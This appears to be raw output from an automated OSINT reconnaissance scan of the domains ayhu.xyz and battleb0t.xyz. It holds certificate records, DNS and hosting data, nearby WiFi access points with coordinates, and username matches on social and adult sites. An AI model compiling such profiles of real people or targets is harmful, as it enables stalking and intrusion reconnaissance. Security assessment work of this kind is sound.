u'issuer_ca_id': 183267, u'name_value': u'ayhu.xyz\ncpanel.ayhu.xyz\ncpcalendars.ayhu.xyz\ncpcontacts.ayhu.xyz\nmail.ayhu.xyz\nwebdisk.ayhu.xyz\nwebmail.ayhu.xyz\nwww.ayhu.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'ayhu.xyz', u'serial_number': u'04897c23d88920d1c5b3ae3091443a2381b8', u'entry_timestamp': u'2022-12-14T04:53:55.433', u'id': 8209126729}, {u'not_after': u'2023-03-14T03:53:53', u'not_before': u'2022-12-14T03:53:54', u'issuer_ca_id': 183267, u'name_value': u'ayhu.xyz\ncpanel.ayhu.xyz\ncpcalendars.ayhu.xyz\ncpcontacts.ayhu.xyz\nmail.ayhu.xyz\nwebdisk.ayhu.xyz\nwebmail.ayhu.xyz\nwww.ayhu.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'ayhu.xyz', u'serial_number': u'04897c23d88920d1c5b3ae3091443a2381b8', u'entry_timestamp': u'2022-12-14T04:53:54.573', u'id': 8196005223}, {u'not_after': u'2023-03-13T19:16:53', u'not_before': u'2022-12-13T19:16:54', u'issuer_ca_id': 183267, u'name_value': u'*.ayhu.xyz\nayhu.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'*.ayhu.xyz', u'serial_number': u'0488a73cdb484e7a5b3055608f2320348b3f', u'entry_timestamp': u'2022-12-13T20:16:55.143', u'id': 8206782905}, {u'not_after': u'2023-03-13T19:16:53', u'not_before': u'2022-12-13T19:16:54', u'issuer_ca_id': 183267, u'name_value': u'*.ayhu.xyz\nayhu.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'*.ayhu.xyz', u'serial_number': u'0488a73cdb484e7a5b3055608f2320348b3f', u'entry_timestamp': u'2022-12-13T20:16:54.437', u'id': 8193169403}, {u'not_after': u'2023-03-13T18:07:06', u'not_before': u'2022-12-13T18:07:07', u'issuer_ca_id': 183267, u'name_value': u'ayhu.xyz\nmail.ayhu.xyz\nwww.ayhu.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'ayhu.xyz', u'serial_number': u'047ba367f476b8d086bdaa81687c78c65324', u'entry_timestamp': u'2022-12-13T19:07:08.931', u'id': 8206381262}, {u'not_after': u'2023-03-13T18:07:06', u'not_before': u'2022-12-13T18:07:07', 
u'issuer_ca_id': 183267, u'name_value': u'ayhu.xyz\nmail.ayhu.xyz\nwww.ayhu.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'ayhu.xyz', u'serial_number': u'047ba367f476b8d086bdaa81687c78c65324', u'entry_timestamp': u'2022-12-13T19:07:08.083', u'id': 8192906588}, {u'not_after': u'2023-03-13T17:51:42', u'not_before': u'2022-12-13T17:51:43', u'issuer_ca_id': 183267, u'name_value': u'*.ayhu.xyz\nayhu.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'*.ayhu.xyz', u'serial_number': u'0318ae067efc0b78465c8bfe1a31bf5b16b8', u'entry_timestamp': u'2022-12-13T18:51:43.988', u'id': 8206326761}, {u'not_after': u'2023-03-13T17:51:42', u'not_before': u'2022-12-13T17:51:43', u'issuer_ca_id': 183267, u'name_value': u'*.ayhu.xyz\nayhu.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'*.ayhu.xyz', u'serial_number': u'0318ae067efc0b78465c8bfe1a31bf5b16b8', u'entry_timestamp': u'2022-12-13T18:51:43.756', u'id': 8193180831}] |
| 2023-05-12 03:23:02 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | Destructoid (Category: social)
https://www.destructoid.com/?name=ayhu | ayhu |
| 2023-05-12 02:54:23 | Web Content Type | No | Web Spider | 0 | 0 | 4 | 0 | None | text/html;charset=utf-8 | https://www.ayhu.xyz/?__cf_chl_f_tk=JtV8r0GkxGajl1GKjCT6mPEPAroD8NWzOwVMv5NMEkM-1683860062-0-gaNycGzNCiU |
| 2023-05-12 02:54:22 | Linked URL - Internal | No | Web Spider | 0 | 0 | 2 | 0 | None | http://www.ayhu.xyz | www.ayhu.xyz |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | HOME-1AA2 (Net ID: 00:1D:D2:1B:1A:A0) | 32.8608, -79.9746 |
| 2023-05-12 03:10:19 | Malicious IP on Same Subnet | Yes | VoIPBL OpenPBX IPs | 0 | 0 | 3 | 0 | None | VOIPBL Publicly Accessible PBX List [188.114.96.0/24]
http://www.voipbl.org/update | 188.114.96.0/24 |
| 2023-05-12 03:23:02 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | XVIDEOS-profiles (Category: XXXPORNXXX)
https://www.xvideos.com/profiles/ayhu | ayhu |
| 2023-05-12 02:54:18 | Linked URL - Internal | No | Web Spider | 1 | 0 | 3 | 0 | None | https://pics.battleb0t.xyz/images/kappi_1.png | https://pics.battleb0t.xyz/ |
| 2023-05-12 03:10:04 | Affiliate - Internet Name | No | DNS Resolver | 1 | 0 | 4 | 0 | None | beatrixhaller.at | 207.154.228.167 |
| 2023-05-12 03:18:56 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | 55 2nd PMO (Net ID: 00:01:21:10:61:00) | 37.7813933,-122.3918002 |
| 2023-05-12 02:44:53 | SSL Certificate - Raw Data | No | Certificate Transparency | 1 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:36:85:4f:53:33:b4:86:64:2a:83:12:ed:95:43:fe:1e:22
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Jan 2 18:58:42 2023 GMT
Not After : Apr 2 18:58:41 2023 GMT
Subject: CN=teamcity.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
00:a9:1b:77:20:87:f6:da:b4:e6:55:f1:15:61:14:
5d:d5:64:2e:1b:95:d0:fa:42:f5:c5:a3:6e:02:4b:
41:fb:df:35:0c:b5:28:23:7f:95:78:79:7a:ae:1b:
33:21:14:1a:cf:54:dc:ad:7c:ad:0e:d0:0d:13:24:
ac:b2:17:d0:67:2e:56:2e:b6:b0:fc:48:83:bd:01:
86:52:7b:96:4e:60:82:98:48:6b:33:90:dc:af:7a:
0e:ed:26:47:56:e9:2a:9b:55:f7:eb:69:7f:53:8a:
65:d2:d9:9f:8e:b4:d7:c2:d1:e2:bc:27:0e:51:4c:
6a:50:43:bf:f3:eb:93:79:c5:c0:01:20:e4:3f:17:
e9:46:96:6a:c9:c7:d3:3a:19:6a:20:08:fd:61:d6:
98:cf:84:d5:28:4b:ee:2d:d4:11:0b:36:29:51:b8:
23:d5:73:76:da:70:98:bf:4f:33:c0:fe:34:a0:ab:
09:05:a6:dc:26:b2:66:b1:51:b6:f2:4f:d9:92:3a:
c0:21:8b:2a:63:52:83:3f:e9:e2:13:c0:c2:c9:2d:
d5:e5:7e:fd:90:7e:37:42:6b:b9:54:b1:2f:9b:98:
24:d8:0b:1b:69:e7:d3:08:0e:71:57:e8:1a:67:a6:
92:84:48:3f:fc:46:40:41:65:20:38:c9:7e:99:04:
34:72:9a:a0:65:84:01:2f:31:b1:86:06:22:39:91:
0a:ee:bd:30:20:85:c5:8d:5b:4e:77:39:ae:9b:09:
06:f6:07:9d:dd:2d:ba:92:b9:4a:fe:af:b4:b2:6a:
1c:46:10:aa:88:c3:34:ab:7b:51:a7:88:62:ff:6f:
89:37:e0:83:c3:40:7b:7e:a8:e9:d2:e9:e0:68:ff:
51:7e:4a:c3:4d:57:60:55:c2:2c:5e:84:55:31:0d:
f9:06:48:b8:fd:a5:13:e0:6d:e6:16:0e:03:58:98:
01:6a:9c:dd:37:75:36:74:a0:0e:9a:ed:4d:d0:b0:
57:3c:8d:0d:2e:93:98:3c:31:25:01:37:1f:57:7e:
ef:84:b5:c0:04:9b:56:77:f4:78:da:7b:d3:51:11:
80:33:d3:18:83:ee:96:99:02:db:e7:fd:22:71:5a:
7f:e7:e3:95:25:33:c7:56:7f:0d:59:30:dc:3e:03:
7d:f0:6b:ae:f9:f9:7c:ad:ec:ad:62:73:0e:7f:47:
4e:2a:02:fd:df:82:83:00:62:ec:61:18:4d:70:9d:
bd:b9:85:be:c1:ed:b1:f9:61:e0:dc:70:d2:b3:0d:
be:23:ab:b6:3a:43:ae:fe:c3:d3:cf:08:6c:c7:33:
70:eb:d2:70:df:6f:ce:26:37:4c:eb:f9:4f:c2:58:
32:f9:79
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
02:C9:94:28:32:1B:B1:2F:E4:C4:4F:88:0E:4C:57:09:73:5A:37:AF
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:teamcity.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : E8:3E:D0:DA:3E:F5:06:35:32:E7:57:28:BC:89:6B:C9:
03:D3:CB:D1:11:6B:EC:EB:69:E1:77:7D:6D:06:BD:6E
Timestamp : Jan 2 19:58:42.072 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:21:00:C3:06:C6:C9:50:41:7A:D7:6C:70:98:
51:7B:09:5D:89:5F:4F:70:26:E1:F3:55:05:EB:4B:EB:
4E:9B:F0:F2:88:02:20:0D:25:66:1C:2B:B5:DD:05:53:
30:99:F3:B4:0E:BD:C7:CD:B0:F0:5C:10:43:36:86:5F:
33:1B:1F:4F:B8:11:9A
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 7A:32:8C:54:D8:B7:2D:B6:20:EA:38:E0:52:1E:E9:84:
16:70:32:13:85:4D:3B:D2:2B:C1:3A:57:A3:52:EB:52
Timestamp : Jan 2 19:58:42.586 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:21:00:B0:57:94:1E:8F:52:58:AA:CA:03:15:
81:F7:97:21:F9:28:45:54:DF:F1:77:F6:A5:EC:58:76:
D4:E4:12:AD:72:02:20:01:EE:79:67:15:46:B5:E0:30:
01:5F:EC:EA:1F:02:05:AC:32:1E:71:83:9E:36:A7:78:
3E:88:36:4C:5A:59:65
Signature Algorithm: sha256WithRSAEncryption
00:08:62:12:2d:66:22:5c:b5:95:b3:65:a0:38:13:b2:e8:94:
fc:c1:f0:43:eb:c7:1d:b0:f8:81:fa:e3:8a:ff:5b:71:ba:c9:
f0:8c:f7:2d:1c:f7:06:60:a9:cc:2b:a3:6a:74:56:5c:cc:ee:
dd:59:f1:89:1a:b3:64:77:7a:c3:42:25:ce:6f:ac:00:39:8c:
a8:ce:ab:de:74:9d:af:21:0a:8f:b8:da:c8:3a:34:04:13:53:
15:9a:a4:d4:ed:01:76:22:4f:b2:ec:9f:6d:03:d3:fa:18:6c:
67:6c:d6:b6:ce:7c:21:a4:1d:31:9c:0b:67:28:45:a7:ef:50:
97:79:ef:ba:a7:08:97:43:77:c8:c9:14:ff:92:90:23:36:be:
38:39:aa:a3:93:44:43:ea:01:c8:6f:d8:16:59:02:23:ab:26:
37:6a:12:88:93:b7:fe:c2:0d:03:0c:53:22:d8:37:25:ad:01:
bc:05:a2:c1:63:10:a5:01:dc:4e:2b:3f:07:57:03:2b:c0:d6:
50:e4:e1:65:6d:4b:fd:e0:d9:56:40:77:bf:53:f8:f8:15:43:
95:2f:e5:cc:d5:7e:3a:08:ae:5e:a2:25:e0:3f:95:7a:61:d1:
0e:7f:79:5b:19:24:0a:bf:5f:bd:78:ba:c9:ea:6b:b8:bc:16:
32:d8:03:9b
| battleb0t.xyz |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | logitec-99596f (Net ID: 00:01:8E:99:59:6E) | 50.1188, 8.6843 |
| 2023-05-12 02:50:26 | Legal Entity Identifier | No | GLEIF | 0 | 0 | 3 | 0 | None | 5493007DY18BGNLDWU14 | Cloudflare\, Inc. |
| 2023-05-12 02:53:17 | IP Address | No | Mnemonic PassiveDNS | 117 | 0 | 1 | 0 | None | 87.248.157.102 | ayhu.xyz |
| 2023-05-12 03:18:49 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | My Wireless Network B (Net ID: 00:02:2D:2C:6D:7E) | 34.0544, -118.244 |
| 2023-05-12 02:46:17 | Affiliate Description - Category | No | DuckDuckGo | 0 | 0 | 3 | 0 | None | Cloud computing providers | cdn-185-199-111-153.github.com |
| 2023-05-12 02:50:17 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | fluid.battleb0t.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:2c:84:3a:08:10:23:75:f2:8a:d5:a0:cb:cc:f6:da:14:6e
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Dec 27 01:32:07 2022 GMT
Not After : Mar 27 01:32:06 2023 GMT
Subject: CN=fluid.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
00:ab:c7:1b:0c:ed:c6:01:f8:ea:a9:b3:cf:08:17:
4f:a2:cb:7c:34:c4:66:12:e6:ef:f3:98:17:79:c9:
65:ee:66:4c:1f:9a:92:7d:33:ee:07:fa:2e:15:62:
f7:b4:f3:1f:d5:4f:2e:b1:67:a8:49:42:bf:e3:cc:
9a:b7:30:46:c2:68:f5:28:a9:64:69:6f:4c:4b:64:
24:c9:dc:ed:46:9f:a4:1f:c2:ef:6f:36:d0:bc:69:
27:b8:e2:d6:18:70:40:2c:b4:f5:ee:8f:f7:0d:8c:
6e:03:92:e7:5d:d6:3e:bc:bb:c9:5b:28:10:a0:5a:
f6:37:f5:e1:9e:15:23:72:6e:8e:69:01:09:a4:8c:
a4:c9:d7:db:05:01:90:48:4b:90:20:8c:38:7a:0a:
60:74:79:18:26:30:8e:60:0b:17:b9:24:a0:80:df:
3f:14:00:d3:09:e7:34:47:35:63:7c:54:d2:a0:9d:
e1:57:d1:cb:13:d3:3c:30:24:97:8e:ea:34:00:9f:
cc:6c:0c:6a:f7:54:bc:5e:60:dc:46:31:c2:09:de:
d9:c3:e3:63:1e:8f:1c:c5:90:90:e8:da:86:be:7d:
f1:c3:1f:1a:86:69:9b:0b:e0:b2:0c:47:08:c8:92:
59:2b:66:2f:fa:a1:38:a1:2f:10:65:f6:97:fd:16:
87:33
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
63:4E:15:85:56:5A:A4:94:02:C2:16:42:A4:A5:97:9A:38:02:57:97
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:fluid.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
33:08:c1:7e:b3:24:8e:6e:4d:f7:51:42:26:15:9a:55:38:a0:
00:54:bb:bf:aa:57:22:d3:f8:51:d0:9b:b6:f7:48:0e:01:fc:
20:eb:f8:09:fe:e5:12:c5:27:1a:bc:14:2c:c8:47:50:c4:fe:
3b:82:e2:94:1e:ea:46:71:f7:de:cb:93:8d:d3:d6:0e:2f:57:
cf:7c:ae:9d:b7:80:a0:8c:70:81:89:7b:49:c0:84:74:4f:69:
72:bc:41:cd:36:95:5b:ed:7b:a9:03:f4:8f:4c:84:5d:66:e9:
62:45:a8:88:57:2d:42:3b:84:55:29:dc:10:ee:9a:ff:95:59:
7c:96:dc:e9:0f:e7:15:2b:2e:77:02:54:6b:c0:2f:7c:2a:2b:
db:82:1c:6f:b4:a2:5b:f7:1a:91:dc:f4:e2:0e:55:aa:62:5d:
ea:10:a0:10:94:4c:43:5d:24:37:b8:7d:e2:3c:f4:71:74:02:
76:90:40:10:c2:a1:be:28:fb:60:72:80:4c:c5:16:2d:8f:d6:
56:41:19:5e:15:ac:ce:da:7c:e0:18:25:f8:1f:66:f3:f8:f8:
6e:35:dd:10:1a:29:03:23:f7:24:0b:53:2d:1f:94:96:bc:7f:
53:53:c0:38:4a:f1:89:9a:26:af:b7:ac:c3:a2:4f:e2:bf:5c:
17:23:7a:07
|
| 2023-05-12 03:08:48 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 3 | 0 | None | 104.196.30.228 | 104.196.30.220 |
| 2023-05-12 03:03:51 | Co-Hosted Site | No | ThreatMiner | 0 | 0 | 2 | 0 | None | rathook.cc | 185.199.110.153 |
| 2023-05-12 02:44:14 | Co-Hosted Site - Domain Name | No | SSL Certificate Analyzer | 1 | 1 | 2 | 0 | None | netlify.app | pics.battleb0t.xyz |
| 2023-05-12 02:53:32 | Raw Data from RIRs | No | Censys | 0 | 0 | 2 | 0 | None | {"last_updated_at": "2023-05-11T22:16:53.020Z", "ip": "185.199.111.153", "location_updated_at": "2023-05-05T15:17:56.721305Z", "autonomous_system_updated_at": "2023-05-10T21:17:43.350798Z", "location": {"province": "California", "city": "San Francisco", "country": "United States", "coordinates": {"latitude": 37.7621, "longitude": -122.3971}, "postal_code": "94107", "country_code": "US", "timezone": "America/Los_Angeles", "continent": "North America"}, "dns": {"records": {"docs.c-labs.com": {"record_type": "CNAME", "resolved_at": "2023-03-17T13:39:25.912117315Z"}, "pypandas.com": {"record_type": "A", "resolved_at": "2023-05-08T15:50:05.581014840Z"}, "www.yapengtian.com": {"record_type": "CNAME", "resolved_at": "2023-03-20T00:52:52.132177648Z"}, "www.gmacd.net": {"record_type": "CNAME", "resolved_at": "2023-04-11T20:22:42.495209956Z"}, "beta.ahanbama.com": {"record_type": "CNAME", "resolved_at": "2023-03-11T12:55:52.485481874Z"}, "navi.kane.ren": {"record_type": "CNAME", "resolved_at": "2023-03-19T02:48:51.057736107Z"}, "rowanmanning.com": {"record_type": "A", "resolved_at": "2023-03-16T14:14:04.579032272Z"}, "www.dolevoper.io": {"record_type": "CNAME", "resolved_at": "2023-03-20T01:51:53.604722811Z"}, "yosoy.engineer": {"record_type": "A", "resolved_at": "2023-04-22T16:29:55.150359190Z"}, "njuics.cn": {"record_type": "CNAME", "resolved_at": "2023-03-22T10:17:45.580207010Z"}, "fanschou.github.io": {"record_type": "A", "resolved_at": "2023-03-20T01:52:09.688479139Z"}, "meth.supplies": {"record_type": "A", "resolved_at": "2023-03-04T19:36:17.924857492Z"}, "wrapwijzer.nl": {"record_type": "A", "resolved_at": "2023-03-28T21:17:50.530330652Z"}, "www.jordancox.me": {"record_type": "CNAME", "resolved_at": "2023-02-25T17:36:05.584035257Z"}, "devxchange.io": {"record_type": "A", "resolved_at": "2023-03-07T16:15:10.934357942Z"}, "examples.allegro.oss.symphony.com": {"record_type": "CNAME", 
"resolved_at": "2023-03-22T19:02:00.213340439Z"}, "gmacd.net": {"record_type": "A", "resolved_at": "2023-04-27T21:00:21.802895223Z"}, "kahoneconcept.github.io": {"record_type": "A", "resolved_at": "2023-03-22T08:07:48.854244117Z"}, "emilyhem.com": {"record_type": "A", "resolved_at": "2023-03-10T13:30:54.344324871Z"}, "get.intersolar-nft.com": {"record_type": "CNAME", "resolved_at": "2022-09-29T13:43:22.976827994Z"}, "status.surit.com.au": {"record_type": "CNAME", "resolved_at": "2023-04-09T12:20:38.969193291Z"}, "blog.zantop.cn": {"record_type": "CNAME", "resolved_at": "2023-03-20T19:23:21.566189428Z"}, "levistmimarlik.com": {"record_type": "A", "resolved_at": "2023-02-27T14:19:09.002141799Z"}, "intersolarnft.github.io": {"record_type": "A", "resolved_at": "2023-03-10T00:16:10.689229599Z"}, "arpi.io": {"record_type": "A", "resolved_at": "2023-03-11T16:23:03.250015076Z"}, "scavision.alu.moe": {"record_type": "CNAME", "resolved_at": "2023-03-07T16:55:09.796012045Z"}, "www.traveltopakistan.site": {"record_type": "CNAME", "resolved_at": "2022-10-25T17:20:31.527625724Z"}, "www.funmitoblessed.com": {"record_type": "CNAME", "resolved_at": "2023-04-24T14:40:07.732044366Z"}, "xzmygit.github.io": {"record_type": "A", "resolved_at": "2023-03-14T00:28:28.871779687Z"}, "api.kekesi.dev": {"record_type": "CNAME", "resolved_at": "2023-03-20T15:57:13.673998398Z"}, "southseaadventure.tesujimath.org": {"record_type": "CNAME", "resolved_at": "2023-02-19T19:08:50.812715230Z"}, "www.rowanmanning.com": {"record_type": "CNAME", "resolved_at": "2023-03-22T10:54:15.722717563Z"}, "preapprove.manta.network": {"record_type": "CNAME", "resolved_at": "2023-03-12T17:39:58.377068988Z"}, "thelostyerejm.com": {"record_type": "A", "resolved_at": "2023-04-05T16:10:23.558053412Z"}, "codepug.com": {"record_type": "A", "resolved_at": "2023-03-09T13:42:42.963246076Z"}, "www.phorgr.com": {"record_type": "CNAME", "resolved_at": "2022-11-21T13:38:18.017307639Z"}, "comics.bilardi.net": {"record_type": 
| 185.199.111.153 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | fansly (Category: XXXPORNXXX)
https://fansly.com/login/posts | login |
| 2023-05-12 02:45:17 | Raw Data from RIRs | No | ipapi.co | 0 | 0 | 4 | 0 | None | {u'region_code': u'ON', u'country_tld': u'.ca', u'ip': u'2606:4700:3037::6815:470e', u'currency_name': u'Dollar', u'currency': u'CAD', u'country_population': 37058856, u'country_code': u'CA', u'timezone': u'America/Toronto', u'city': u'Toronto', u'network': u'2606:4700:3036::/47', u'languages': u'en-CA,fr-CA,iu', u'version': u'IPv6', u'latitude': 43.6547, u'in_eu': False, u'utc_offset': u'-0400', u'continent_code': u'NA', u'country_name': u'Canada', u'country_capital': u'Ottawa', u'org': u'CLOUDFLARENET', u'postal': u'M5A', u'asn': u'AS13335', u'country': u'CA', u'region': u'Ontario', u'longitude': -79.3623, u'country_calling_code': u'+1', u'country_area': 9984670.0, u'country_code_iso3': u'CAN'} | 2606:4700:3037::6815:470e |
| 2023-05-12 03:03:33 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | 00cybermonk00.github.io |
| 2023-05-12 02:53:45 | Netblock IPv6 Membership | No | Censys | 0 | 0 | 2 | 0 | None | 2606:50c0:8002::/48 | 2606:50c0:8002::153 |
| 2023-05-12 03:00:31 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 4 | 0 | None | chacha20-poly1305@openssh.com | |
| 2023-05-12 02:53:09 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | | 185.199.109.153 |
| 2023-05-12 02:55:27 | Linked URL - Internal | No | URLScan.io | 0 | 0 | 1 | 0 | None | http://kekw.battleb0t.xyz/ | battleb0t.xyz |
| 2023-05-12 02:54:17 | Open TCP Port Banner | No | Censys | 0 | 0 | 4 | 0 | None | HTTP/1.1 403 Forbidden
Date: <REDACTED>
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Frame-Options: SAMEORIGIN
Referrer-Policy: same-origin
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 7c5e062258aa2252-ORD
Content-Encoding: gzip
| 2606:4700:3037::6815:470e |
| 2023-05-12 03:01:42 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.211): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:48:00 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None |
00000000-00006904]\n "load_statistics.db" has type "SQLite 3.x database last written using SQLite version 3039003"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\load_statistics.db]- [targetUID: 00000000-00006904]\n "data_1" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\GrShaderCache\\data_1]- [targetUID: 00000000-00006904]\n "data_1" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\DawnCache\\data_1]- [targetUID: 00000000-00006904]\n "data_1" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\ShaderCache\\data_1]- [targetUID: 00000000-00006904]\n "data_1" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\GPUCache\\data_1]- [targetUID: 00000000-00006904]\n "History" has type "SQLite 3.x database last written using SQLite version 3039003"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\History]- [targetUID: 00000000-00006904]\n "wallet-checkout-eligible-sites.json" has type "ASCII text"- [targetUID: N/A]\n "wallet-checkout-eligible-sites-pre-stable.json" has type "ASCII text"- [targetUID: N/A]\n "Web Data" has type "SQLite 3.x database last written using SQLite version 3039003"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Web Data]- [targetUID: 00000000-00006904]\n "Visited Links" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Visited Links]- [targetUID: 00000000-00006904]\n "data_0" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\data_0]- [targetUID: 00000000-00006904]\n "load_statistics.db-wal" has type "SQLite Write-Ahead Log version 3007000"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\load_statistics.db-wal]- [targetUID: 00000000-00006904]\n "Tabs_13328191914569285" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Sessions\\Tabs_13328191914569285]- [targetUID: 
00000000-00006904]\n "f42c05eb-7c48-4ba6-b5ad-2a6667a882dc.tmp" has type "JSON data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Ad Blocking\\f42c05eb-7c48-4ba6-b5ad-2a6667a882dc.tmp]- [targetUID: 00000000-00006904]\n "Diagnostic Data-wal" has type "SQLite Write-Ahead Log version 3007000"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data | 185.199.110.153 |
| 2023-05-12 03:19:00 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | My Passport (2.4 GHz) - 070B31 (Net ID: 00:00:C0:07:0B:31) | 52.3759, 4.8975 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | linksys_SES_31322 (Net ID: 00:1C:10:8D:00:CA) | 32.8608, -79.9746 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | MobileInternet (Net ID: 00:02:B3:AE:AB:38) | 50.1188, 8.6843 |
| 2023-05-12 03:09:02 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 2 | 0 | None | 87.248.157.100 | 87.248.157.102 |
| 2023-05-12 03:18:49 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | <no ssid> (Net ID: 00:02:2D:9E:09:9A) | 34.0544, -118.244 |
| 2023-05-12 02:45:04 | Country | No | Country Name Extractor | 0 | 0 | 3 | 0 | None | United States | San Francisco, California, CA, United States, US |
| 2023-05-12 02:44:12 | SSL Certificate - Issued by | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | C=US,O=DigiCert Inc,CN=DigiCert TLS RSA SHA256 2020 CA1 | www.battleb0t.xyz |
| 2023-05-12 03:15:35 | Web Content Language | No | Language Detector | 0 | 0 | 6 | 0 | None | English | <!DOCTYPE html>
<html lang="en-US">
<head>
<title>Just a moment...</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=Edge">
<meta name="robots" content="noindex,nofollow">
<meta name="viewport" content="width=device-width,initial-scale=1">
<link href="/cdn-cgi/styles/challenges.css" rel="stylesheet">
</head>
<body class="no-js">
<div class="main-wrapper" role="main">
<div class="main-content">
<noscript>
<div id="challenge-error-title">
<div class="h2">
<span class="icon-wrapper">
<div class="heading-icon warning-icon"></div>
</span>
<span id="challenge-error-text">
Enable JavaScript and cookies to continue
</span>
</div>
</div>
</noscript>
<div id="trk_jschal_js" style="display:none;background-image:url('/cdn-cgi/images/trace/managed/nojs/transparent.gif?ray=7c5f60726fad1912')"></div>
